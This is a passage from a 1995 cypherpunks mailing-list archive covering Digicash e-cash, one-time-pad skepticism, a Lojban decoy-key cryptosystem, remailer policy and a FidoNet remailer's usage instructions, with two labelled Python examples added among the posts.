needs a real bank to issue e-cash. Well, MT Bank is a real bank,
but they have managed to violate at least one major Federal Reserve
requirement (accounts in the ECash mint are clearly demand deposit
accounts -- it would have been trivial to define them differently
but somebody apparently wasn't thinking.) A technically-oriented NBFI
could have done a much better job, without a lot of the "real bank"
baggage, such as minimum deposits ($250, not $2,500, but still
pretty steep for someone wanting to spend $.10 on something.) My
understanding is that the _bank account_ is FDIC insured, but not
the ECash. I could be wrong -- their materials are extremely confusing
and hard to follow.

As one of my co-workers said today, "It will be interesting to sit
back and watch them take regulatory mortar fire." Indeed.

I'm really hoping that they pull their act together -- I've already
sent in my account application -- but things look really grim at
the moment. There are certainly a lot of projects list members are
working on that would be greatly enhanced by functioning, popular
e-cash. I encourage everyone to give them lots of helpful feedback
so that they can turn this around.

On another note, I'm hoping that some of you will also bite the
bullet, get accounts, and join me attempting to win valuable
prizes in Sameer's "Hack Digicash" promotion. I'd rather see one
of us find holes in this than see the whole thing melt into the
ground.

This extremely unprofessional, bungled launch does, I admit, make
Mondex (with scads of beautiful marketing literature) look better all
the time, although based on some conversations on Sunday, it appears
that they may have _extremely serious_ architectural security problems.
We'll see how things play out.

Later,

Doug

>        With the release of digicash I hope that we can soon make this
>stuff for-pay and much of the spam problem will be fixed. (Not all of
>it, of course.)
>        (I am rather hesitant to setup an account with Mark Twain
>though.. $2,500 min balance and not FDIC insured?)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 23 Oct 95 15:07:40 PDT
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: "power one time pad"
In-Reply-To: <doug-9509231532.AA014714381@netman.eng.auburn.edu>
Message-ID: <9510232207.AA15919@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>This is the most confusing part of the whole thing.. How does it get started.
>unfortunately, as this is embroiled in non-disclosure and patent-pending,
>we're not going to know, but are forced to take the word of experts such
>as David Kahn that it works as advertised.

Has David Kahn made such a statement? Where can I read the context in which it 
was made? Kahn is a historian of cryptography, not a cryptographer. 

On the basis of the documents made available to me it looks like the standard 
linear feedback sequence generator hack. It does not appear to be a one time pad 
system in anything but name.


>Yes, I and a friend of mine were the only two people in the audience
>that were not Journalists.  It does look rather intriguing, but so much
>negativism is flying about, that most people have dismissed it out of hand.

Often the best thing to do. I don't know who designed POTP nor what they created 
but if I use it and it fails I take the risk. Note that in the Mondex case if it 
fails Mondex take the hit.


As a final point, the security of one time pads is only guaranteed as long as 
the pads are never reused in any sense whatsoever. The system is exceptionally 
fragile, the slightest breach of security can destroy it, consider the Venona 
decrypts for example.

I'm thinking of writing a paper "How One Time Pads Fail" to discuss failures of 
"unbreakable systems". I have some new material on how to copy the Venona 
cracking method and also plan to analyse POTP and a few other alleged one time 
pad systems. If anyone knows of other alleged one time pad systems that weren't 
please email me and I'll include them.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Oct 95 18:15:24 PDT
To: "Dana W. Albrecht" <cypherpunks@toad.com
Subject: Re: Info: Elementrix POTP
Message-ID: <acb18bb35e021004a6ee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I just saw a glaring error in this article which Dana forwards to us which
needs correcting:

At 9:19 PM 10/23/95, Dana W. Albrecht wrote:
>Forwarded from sci.crypt:
>
>In article <45t9oh$6vd@newsbf02.news.aol.com>, whmurray@aol.com (WHMurray)
>writes:
>> In article <45qkp5$8rh@netaxs.com>, grendel@netaxs.com (Michael Handler)
>> writes:


>> >OTOH, I saw a press-release on Cypherpunks a week or two back that
>> >claimed Whitfield Diffie and David Kahn had both examined the algorithm
>> >under NDA, and both were blown away by it. OTOOH, I don't know how much
>> >Diffie and Kahn know about TCP/IP.
>>
>> Diffie knows enough; Kahn less.  However, both are geniuses and know what
>> they need to know.  As to their being "blown away," I tend to doubt it.
>> The idea is useful but not revolutionary.

It was Winn Schwartau, not Whit Diffie, who gave the rave review.

Schwartau wrote the book "Information Warfare," as well as a novel about
hacking, and is not a professional cryptologist.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 23 Oct 95 16:34:41 PDT
To: cypherpunks@toad.com
Subject: A secure cryptosystem with a 40-bit key?
Message-ID: <199510232334.TAA11134@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


I've been reading a bit recently on constructed languages like
Esperanto.  I came across one that developed out of something called
"LOGLAN" that was published in Scientific American in the early
sixties.  The current active project is called "Lojban".  It has one
really curious property that gave me an idea for an interesting
symmetric-key cryptosystem.

All "native" Lojban words are of entirely predictable forms.  "Root"
words are all five characters containing three consonants and two
vowels in one of two patterns (CCVCV and CVCCV).  "Structure" words have
four forms (VV, CV, CVV, and CV'V).  "Combining forms" have two forms
(CVC and CV'C).  All other words are not "native" words (being either
proper names or borrowed words).  The upshot of this is that there is a
fixed limit on the size of the Lojban dictionary of 249500 words (given
17 consonants and five vowels).

The grammar of the language is *so* regularized that they are able to
give a YACC description for it.

A message written entirely using native Lojban words can be encrypted
in a codebook fashion where the particular codebook to be used is a
permutation of the dictionary represented by a 40-bit number (18 bits
to permute the "root word" list, 10 bits for the "structure word" list,
and 12 bits for the "combining form" list).

This system has the interesting property that *any* plaintext with the
same grammatical structure is a potential encryption of a given
cyphertext.  This is similar to some more usual cryptosystems which
operate at the lexical level but which are designed to create this
effect, but has the curious side effect that it is *very* easy to
determine a false-key which makes the transmitted message say nearly
anything you want, thus making mandatory key escrow systems
irrelevant.

When you want to send the message "attack at dawn", you devise a
grammatically identical message, "party 'til you puke" (which is
grammatically identical in Lojban), generate a random key, as well as
the key representing a similar permutation, but with "attack" and
"party" exchanged, "puke" and "morning" exchanged, and so forth.
Transmit the message with the false key in the LEAF field (or report it
to your government-approved escrow agency) and government eavesdroppers
get the wrong message.  Other eavesdroppers get a grammatically
correct, but apparently nonsensical message ("drink by brick").

There's still the problem of borrowed words and proper names, which
remain problems in any codebook approach, but represents a small
portion of the language, and the words which represent individual
letters are part of the "structure words" category, and could be sent
spelled-out.

This works well in Lojban because it never changes word forms based on
grammatical usage.  Most natural language declensions and conjugations
would make the encrypted message ungrammatical, and make it *much* more
difficult to determine a false key for the LEAF field.  The irregularity
of word forms makes the dictionary much more complicated, too.

Comments?
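
The word counts and the false-key construction from the message above, as an added example (not the poster's code). It models a key as an explicit permutation table per word class, which is an assumption, since the message does not say how a 40-bit number selects a permutation; the toy vocabulary is constructed English stand-ins, not Lojban, and all function names are hypothetical.

```python
import math
import random

CONSONANTS, VOWELS = 17, 5  # letter counts given in the message

# Word shapes listed in the message; the apostrophe is a fixed character.
SHAPES = {
    "root": ["CCVCV", "CVCCV"],
    "structure": ["VV", "CV", "CVV", "CV'V"],
    "combining": ["CVC", "CV'C"],
}


def shape_count(shape):
    """Number of distinct strings matching one consonant/vowel shape."""
    n = 1
    for ch in shape:
        n *= CONSONANTS if ch == "C" else VOWELS if ch == "V" else 1
    return n


def class_sizes():
    return {c: sum(shape_count(s) for s in ss) for c, ss in SHAPES.items()}


def index_bits(n):
    """Bits needed to name one word out of n."""
    return math.ceil(math.log2(n))


def permutation_bits(n):
    """Bits needed to name an arbitrary permutation of n words: log2(n!)."""
    return math.lgamma(n + 1) / math.log(2)


# Constructed toy vocabulary, one list per word class.
TOY = {
    "root": ["attack", "party", "dawn", "river", "drink", "brick"],
    "structure": ["at", "by", "til"],
}


def random_key(rng):
    """A key is one permutation table per class: plaintext word -> code word."""
    key = {}
    for cls, words in TOY.items():
        codes = words[:]
        rng.shuffle(codes)
        key[cls] = dict(zip(words, codes))
    return key


def encrypt(msg, key):
    return [(cls, key[cls][w]) for cls, w in msg]


def decrypt(ct, key):
    inverse = {cls: {c: w for w, c in t.items()} for cls, t in key.items()}
    return [(cls, inverse[cls][c]) for cls, c in ct]


def decoy_key(real_key, real_msg, decoy_msg):
    """Build a second key under which the same ciphertext reads as decoy_msg."""
    if [c for c, _ in real_msg] != [c for c, _ in decoy_msg]:
        raise ValueError("messages differ in grammatical structure")
    forced = {cls: {} for cls in real_key}
    for (cls, real_w), (_, decoy_w) in zip(real_msg, decoy_msg):
        code = real_key[cls][real_w]
        if forced[cls].setdefault(decoy_w, code) != code:
            raise ValueError("one decoy word would need two code words")
    key = {}
    for cls, table in real_key.items():
        used = set(forced[cls].values())
        if len(used) != len(forced[cls]):
            raise ValueError("two decoy words would share one code word")
        # Fill the rest of the table so the decoy key is still a permutation.
        free_codes = [c for c in table.values() if c not in used]
        free_words = [w for w in table if w not in forced[cls]]
        key[cls] = {**forced[cls], **dict(zip(free_words, free_codes))}
    return key


if __name__ == "__main__":
    sizes = class_sizes()
    print(sizes, sum(sizes.values()))
    print({c: index_bits(n) for c, n in sizes.items()})
    print(round(permutation_bits(sizes["root"])), "bits for a full root permutation")
```

The 18, 10 and 12 bits are each enough to index one word in its list, while an arbitrary permutation of the root list needs about four million bits, so the decoy construction relies on the key space containing the swapped permutation.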




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 15:45:03 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <acb027040402100417fa@[137.110.24.250]>
Message-ID: <199510232235.SAA26441@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lance Cottrell writes:
> I think one solution to this problem is to encourage (require) the use of
> pseudonym servers. Having a server like alpha as the entity on the from
> line has several advantages.
> 
> 1) Less Spam since it takes some effort to set up the nym and it will be 
> taken away as soon as the spam starts.

I fear this will be a short-lived gain. User-friendly scripts for 
establishing pseudonymous accounts are pretty easy to write. They may be
beyond the average Fast Money Maker, but I expect myself and others will be
putting them out on the Net for general consumption. 

I can certainly imagine one of those scripts being expanded to automatically 
create salesdroid001@nymsrus.org, ..., salesdroid999@nymsrus.org and emitting 
the same spam once from each pseudonym to a different destination. You would
want to apply a statistical spam filter (of the kind mentioned recently by
Greg Broiles) to the entire output of each pseudonymizer in an attempt to
nip such spams in the bud.

Semi-permanent account status confers privileges to the user, IMHO. I
believe a pseudonymous account ideally should be treated the same as a 
regular account on an ISP. For example, an admin will not unilaterally close 
an account upon receiving a single complaint about the account user. 
Certainly I don't know of an ISP that routinely blocks its users' accounts
from sending mail to selected other accounts. Lest I seem too presumptuous, 
let me say that I realize all immediately foreseeable pseudonymizers are
free services. Clearly these service providers can set whatever policies they
wish, and are not directly competing with the fee-charging ISPs. Perhaps 
future fee-charging pseudonymizers will consider these criteria in offering 
enhanced services.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 23 Oct 95 15:58:22 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <acb027040402100417fa@[137.110.24.250]>
Message-ID: <199510232248.SAA26502@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lance Cottrell writes:
> If all nym servers were standardized to run from the same account name
> (nymserve for example) the remailers could be configured to only deliver
> final hops to addresses with that username.

A detail I missed before: the remailers used in pseudonym reply blocks must
somehow deliver replies to the True Name (verinymous ?) address of the holder
of the pseudonym. I suppose they could all finally be routed to the 
pseudonymizer, which would deliver the messages directly to the intended 
recipient (holder of the pseudonym). 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Mon, 23 Oct 95 18:49:20 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510240148.SAA26014@well.com>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca wrote:

>On Wed, 18 Oct 1995, t byfield wrote:
>
>> At 9:42 AM 10/18/95, Hal wrote:
>> 
>>         Of course. The problem is that protocols as implemented permit
>> header-forging: it's a practical fact of the net, and one that maybe
>> shouldn't be overlooked on (basically vague) 'moral' grounds, any more than
>
>The courts can't overlook it either. There goes liability. If I posted 
>pirated software from this account, according to what you're saying, I could 
>claim a forgery and show reasonable doubt.

How difficult is it to forge headers?  How difficult is it to trace a
message to the actual sender if the header is forged?  Is there a way to
quantify traceability on a simple scale, for rough purposes?

Lee

Lee Tien
Attorney
tien@well.sf.ca.us
(510) 525-0817 voice
(510) 525-3015 fax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Mon, 23 Oct 95 18:49:50 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
Message-ID: <199510240149.SAA26129@well.com>
MIME-Version: 1.0
Content-Type: text/plain


What is the cite for this statute?  

Lee

>At 11:47 PM 10/14/95 -0700, anonymous-remailer@shell.portal.com wrote:
>>Has anyone examined the legislative history associated with this statute?
>>
>>I would be surprised if they were singling out anonymous remailers.  They
>may have had other concerns regarding phone abuse, e.g., long distance fraud.  
>>
>>Then again, I could be full of it...
>>
>>
>Doesn't necessarily matter what the legislative history was.  When some
>prosecutor trying to make a name for himself hooks onto this language to
>prosecute an anonymous remailer or other perceived miscreant, nobody will
>remember what the intent was.  The casebooks are full of perversions of
>original intent.
>Jon Goldberg

Lee Tien
Attorney
tien@well.sf.ca.us
(510) 525-0817 voice
(510) 525-3015 fax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 23 Oct 95 17:08:45 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
In-Reply-To: <acac7cd8430210046e54@[205.199.118.202]>
Message-ID: <199510240008.UAA11781@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>THE ROLE OF THE "MESSENGER"
>
>But I think I have a longer term solution, one that involves a change in
>thinking about the differences between the _originator_ of a message and
>the mere _messenger_.
>
>The notion is to much more explicitly separate the functions of the
>"messenger" or "deliverer" from the "originator" or "sender." Granted, this
>is already done in the sense that a piece of e-mail goes through many
>hands. For example, Hal's message that I am responding to here has this in
>the header blocks, showing some of the "couriers" or "messengers":

This is an interesting notion, but one I don't think is quite right.
The anonymous remailer is not merely a courier.  It actively modifies
the message envelope by removing any indication of its origin.  The
main issue in Hal's quoted complaints is that the receiver isn't able
to contact the sender.  This fact is a direct result of the action of
the remailer.

Consider what would happen if a remailer were set up that *didn't*
remove the "From:" data.  Anonymizing remailer operators could attempt
to limit complaints by forwarding everything through the non-anonymizer
to make it the last link.  Who do you think would get the complaints?
The last anonymizer.

>A MAIL DELIVERY SERVICE (don't we already have them? yes, but....)
>
>So, how would this work?
>
>With remailers, even more steps need to be taken to make it absolutely
>clear that the delivered message is not _from_ the last Internet site that
>shows up in the "From:" field. More than just disclaimers are needed.
>
>One approach is for a _notification-based_ system. To wit:
>
>"You have a piece of mail awaiting at our mail delivery service. The
>originator is unknown. The title of the message is "Tentacles of Medusa
>Must Die!" You may retrieve this message by replying to this notification
>with the word "Yes" anywhere in the Subject field. This message will be
>kept for 60 days and then deleted."

I had a similar idea that I mentioned to Hal in a private message.  How
about a POP server that authenticates with crypto, and accepts and
holds email addressed to the keyid of a PGP key?  You send email to
4466A801@keymail.com; it holds them for 30 days (or whatever) and
discards them.  When I connect to the server to retrieve my mail, it
asks for my public key, encrypts a random challenge with it, and I tell
it the decrypted version.  Having proved that I can read messages
encrypted to the key, it delivers messages addressed to the hash of the
key.  It might also allow me to configure an address where
notifications of new messages should be sent.

It's an interesting twist on the anon.penet.fi system, since you
needn't bother tracking all the nym/email mappings, and *can't* give
CoS any incriminating information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 23 Oct 95 16:18:19 PDT
To: cypherpunks@toad.com
Subject: Re: Internet Security Review
Message-ID: <v02120d02acb1ce104d70@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:36 PM 10/23/95, Doug Hughes wrote:

>Just got a copy via mail today. Boy, Dorothy Denning seriously dings
>Tim May in this issue. Interesting reading to know what the other side
>is up to nonetheless. She uses some reasoning that will be compelling to
>many.

This makes me laugh out loud. I have Wit Beer coming out of my nose. My
poor trackball's going to take a major Windex job now, boy.

Denning *doesn't* go for a fellow(?) Certified Cryptographer(tm), probably
because her credentials are all but shot now. She *doesn't* go after
someone *paid* to go after *her* in the policy arena, like Banisar & Co.,
who could beat her with "half his brains tied behind his back". She
wouldn't *dare* go after the politicians like (sorry again, Rush) Mr. Newt,
who *are* thwarting her monomaniacal campaign to sperm^h^h^h^h^h<insert
bodily fluid here>-sample the population for biometric purposes, she goes
after *Tim* *Freakin'* *May* for chrissake.

Gotta watch that "corrupting the youth of Athens" stuff, Tim, 'cuz Big Bad
Ol' Dottie D's gonna get ya!

Feh. Hemlock anyone?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 23 Oct 95 19:28:14 PDT
To: cypherpunks@toad.com
Subject: Mark Twain Bank (was: Anonymity: A Modest Proposal) (fwd)
Message-ID: <199510240222.TAA03524@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> pretty steep for someone wanting to spend $.10 on something.) My
> understanding is that the _bank account_ is FDIC insured, but not
> the ECash. I could be wrong -- their materials are extremely confusing
> and hard to follow.

	My understanding is that the accounts are "WorldCurrency
Access" accounts-- which appear to be Money Market funds, which can be
denominated in one of 25 currencies. (Ecash-linked accounts must be
denominated in dollars.) Being a money market fund, a positive return
is -not- guaranteed, and it is not FDIC insured. It is an "investment"
account, not a "savings" account. (That is my understanding, which
could very well be flawed.)

	Does anyone understand their non-merchant pricing structure?
It had me very confused. Also, what is the difference between a
merchant and a non-merchant? I saw nothing on the pages describing
that. Suppose Community ConneXion wanted to accept ecash. Could we get
a non-merchant account?

> 
> As one of my co-workers said today, "It will be interesting to sit
> back and watch them take regulatory mortar fire." Indeed.
> 
> I'm really hoping that they pull their act together -- I've already
> sent in my account application -- but things look really grim at
> the moment. There are certainly a lot of projects list members are
> working on that would be greatly enhanced by functioning, popular
> e-cash. I encourage everyone to give them lots of helpful feedback
> so that they can turn this around.
> 
> On another note, I'm hoping that some of you will also bite the
> bullet, get accounts, and join me attempting to win valuable
> prizes in Sameer's "Hack Digicash" promotion. I'd rather see one
> of us find holes in this than see the whole thing melt into the
> ground.
> 
> This extremely unprofessional, bungled launch does, I admit, make
> Mondex (with scads of beautiful marketing literature) look better all
> the time, although based on some conversations on Sunday, it appears
> that they may have _extremely serious_ architectural security problems.
> We'll see how things play out.
> 
> Later,
> 
> Doug
> 
> >        With the release of digicash I hope that we can soon make this
> >stuff for-pay and much of the spam problem will be fixed. (Not all of
> >it, of course.)
> >        (I am rather hesitant to set up an account with Mark Twain
> >though.. $2,500 min balance and not FDIC insured?)
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 23 Oct 95 02:33:59 PDT
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.LNX.3.91.951023161515.27409A-100000@ima.net>
Message-ID: <Pine.SOL.3.91.951023192908.6735B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Enzo Michelangeli wrote:
> Adding MD5 support wouldn't be a bad idea. Same for algorithms 
> alternative to Blowfish (3DES etc.) and DH (e.g., with Elliptic 
> functions-based key exchange), all automatically negotiated at connection 
> time.

Starting to sound like you want the crypto layer to be SSL (v3 for DH) or
PCT :-).

eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 23 Oct 95 17:02:50 PDT
To: cypherpunks@toad.com
Subject: Hacking Digicash (was: Article on Digital Cash in "Worth")
In-Reply-To: <acade6614d0210045f23@[205.199.118.202]>
Message-ID: <46haei$i6o@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <acade6614d0210045f23@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
>Not that the issues aren't real, just that a lot of folks
>want to be the "next Goldberg and Wagners," or that they want to add their
>two cents about how Netscape is blowing it.

What about us "current" Goldbergs and Wagners? :-)
>
>I stay out of this, but I certainly don't want to see Digicash given the
>same treatment. Their current product may not be all that some of us desire
>(in terms of anonymity, for example), but it sure does beat the
>alternatives in essential ways.
>
>I don't want to see Netscape so trashed that people turn to lesser-tested
>alternatives without good reason (Microsoft Network being one example), and
>I don't want to see Digicash so trashed that people turn to some product
>like Mondex.

We should be keeping in mind that the goal here is to end up, in one way
or another, with a _secure_ way of transacting on the net.  To that end,
it may be necessary to demonstrate that some current products don't
provide that way.  We certainly don't want people to be scared away
from using one insecure product, only to use another, especially
if the latter is less secure than the former.

At least Netscape published their protocols, if not their implementation.
Digicash, AFAIK, hasn't even done that much.  There is absolutely zero
reason for me to believe that their client is safe.
<SARCASM>For all I know, it could be an essential part of the protocol
to send a dump of my harddrive to Digicash every time I deposit money
into my account.</SARCASM>

I do intend to attempt a reverse-engineer of the ecash protocol,
assuming no one points me to an online copy (no, a paper copy obtained
via a NDA doesn't count).  Donations of a Sparc client binary
and/or access to a real ecash account will be gratefully accepted.

If the reverse-engineer ends up showing a protocol misfeature or
(more likely) a bad implementation (such as a buffer overflow),
I'm not going to keep quiet about it.  Netscape reacted quite
commendably to the finding of bugs in their software (quick admission
of the problem, and timely bugfix).  Hopefully, Digicash will
be as good about it.

Everything would be _so_ much easier to check, though, if these
people would stop this "security through obscurity" garbage and
publish their protocols, if not their source.

   - Ian "Mr. Worf, activate targetting scanners."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 23 Oct 95 17:27:26 PDT
To: tcmay@got.net
Subject: Re: The NSA Visits Compendium
Message-ID: <9510240024.AA23881@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


perhaps we can get epic or eff to archive copies of export requests?

Perhaps companies would be willing to file copies of "we asked to
export this" after the decision was made?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 23 Oct 95 18:33:51 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Reducing the Flames, Attacks, and Nit-Pickings
In-Reply-To: <acb06aea5b021004cdd9@[205.199.118.202]>
Message-ID: <199510240133.VAA13731@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
>Worse, idle speculation about possible security flaws seems wasteful.

Not always.  A couple of months ago someone was asking what the fuss
was about in making sure random number generators were secure.  In
describing potential problems with poor RNG seeds I "idly" speculated
that if Netscape has a lousy RNG that it might be *lots* easier to
attack that than the (then current) brute force attack was.

A week or two later, Ian posted a reverse engineered copy of the
Netscape RNG stuff, and a week or so after that announced his big
hole.

Occasionally, idle speculation sparks good ideas.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Mon, 23 Oct 95 21:48:59 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
Message-ID: <199510240433.AA28545@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Lee Tien writes;
>
> What is the cite for [the PA anti-remailer] statute?
>

Pennsylvania Consolidated Statutes, Title 18, Sections 910 and 3926. 
It's available on the web at http://moose.erie.net/~italo/rssb655.html
- - the Westlaw version of the enacted bill is at "1995 PA S.B. 655 (SN)".


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim.Cannell@f21.n216.z1.fidonet.org (Jim Cannell)
Date: Tue, 24 Oct 95 01:38:27 PDT
To: cypherpunks@toad.com
Subject: Re: FidoNet Remailer
Message-ID: <540_9510240301@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-----BEGIN PGP SIGNED MESSAGE-----

Thanks to all of you who have responded to my announcement of the FidoNet
remailer.  I appreciate the good words.  So far, the remailer has handled
everything that you have thrown at it.  One remailed message bounced back
to me because the FidoNet/internet gateway system could not find the
addressed system.  That one looks like a gateway problem.

Please keep sending messages through it.  Send grunged messages, improperly
addressed messages -- anything you can think of to make it barf.  I want it
to be able to withstand the vicious attacks that I'm sure will come once
the control phreaks in Fido find it exists.

I will be gone the next two weeks, so the system may go down.  Don't expect
any response from me until then, either.   I will answer any mail when I
return.  In the meantime, I'm off tomorrow morning to enjoy Vincent
Cate's hospitality at the Anguilla cypherpunks meet.


Jim - International SecureMail Host (ISMH)
PGP key 1024/B7822B3D
fingerprint =  0F F4 79 06 3B 33 99 D1  07 36 66 66 80 85 76 B3

Protect your right to privacy. Say no to GAK.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim.Cannell@f21.n216.z1.fidonet.org (Jim Cannell)
Date: Tue, 24 Oct 95 01:38:27 PDT
To: cypherpunks@toad.com
Subject: FidoNet Remailer
Message-ID: <53f_9510240301@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-----BEGIN PGP SIGNED MESSAGE-----

I have been a long time lurker on this list, as well as having a long time
interest in crypto.  Most of my activity in this area has been on FidoNet
rather than the internet.  Due to the control phreak nature of much of
FidoNet, I've spent a lot of time and effort in an attempt to just simply
route around the bastards.  I created the SecureMail system, which is a
network of FidoNet nodes that agree to route any and all traffic without
monitoring or censorship.  Within SecureMail, encrypted traffic is not
only permitted, it is encouraged.

Which brings me to the point of this message.  I have written an anonymous
remailer program for FidoNet.  It is currently running on my FidoNet node
in an alpha test mode.  It has only been running a couple of weeks, and
seems to be doing quite well.  I have just added internet addressability
to it.  What this means is that now anonymous messages can be remailed
between FidoNet and the internet.  Having still another routing path should
further decrease the traceability of these messages.

I would like to ask the cypherpunks to help me test the remailer across
the gateway.  Please send many messages through this remailer from both
the FidoNet and the internet side of the gateway.  Try to break it.  I
want a good reliable piece of software, and if it can survive attempts
by this group to break it, there will be a lot more confidence in it.

Following are instructions for using the FidoNet remailer:

- From FidoNet, send your message to Remail at 1:216/21.  From the internet,
send your message to: remail@f21.n216.z1.fidonet.org

In all cases, the first text line of the message must contain a double
colon.  The second line contains the remail command, and the third line
is blank.  The actual text to be remailed starts on line 4.


To send a message to Joe Sixpack at FidoNet address 1:102/903, enter:
::
remail-to: Joe Sixpack @ 1:102/903.


To send a message to an internet address, enter:
::
remail-to: tcmay@got.net

(Sorry, Tim -- couldn't resist using you as an example :-) 


To get a short help file, enter:
::
help


To post a message to the FidoNet SYSOP Echo, enter:
::
remail-to: SYSOP



I'll welcome discussions of this remailer on the list, or in private mail.
Bug reports and/or comments are encouraged.  I can be reached at
Jim.Cannell@f21.n216.z1.fidonet.org


BTW, I will be at the cypherpunks meeting in Anguilla next week.  Hope to
meet some of you there.



Jim - International SecureMail Host (ISMH)
PGP key 1024/B7822B3D
fingerprint =  0F F4 79 06 3B 33 99 D1  07 36 66 66 80 85 76 B3

Protect your right to privacy. Say no to GAK.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
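
A strict parser for the request format given in the instructions above, as an added example (it is not the remailer's own code). Assumptions: the command keyword is matched case-insensitively, a trailing period after a FidoNet address is tolerated, SYSOP is the only echo accepted because it is the only one the message documents, and all function names are hypothetical.

```python
import re

# zone:net/node with an optional .point, e.g. "Joe Sixpack @ 1:102/903"
FIDO_RE = re.compile(
    r"^(?P<name>[^@]+?)\s*@\s*(?P<zone>\d+):(?P<net>\d+)/(?P<node>\d+)"
    r"(?:\.(?P<point>\d+))?\.?$"
)
INET_RE = re.compile(r"^[^\s@]+@[^\s@]+\.[^\s@]+$")
KNOWN_ECHOES = {"SYSOP"}          # assumption: only the echo named in the post


class RemailFormatError(ValueError):
    """Raised for any request that does not match the documented layout."""


def parse_destination(dest):
    """Classify a remail-to value as a FidoNet, internet or echo target."""
    m = FIDO_RE.match(dest)       # checked first: "a@1:2/3.4" also looks like e-mail
    if m:
        address = f"{m['zone']}:{m['net']}/{m['node']}"
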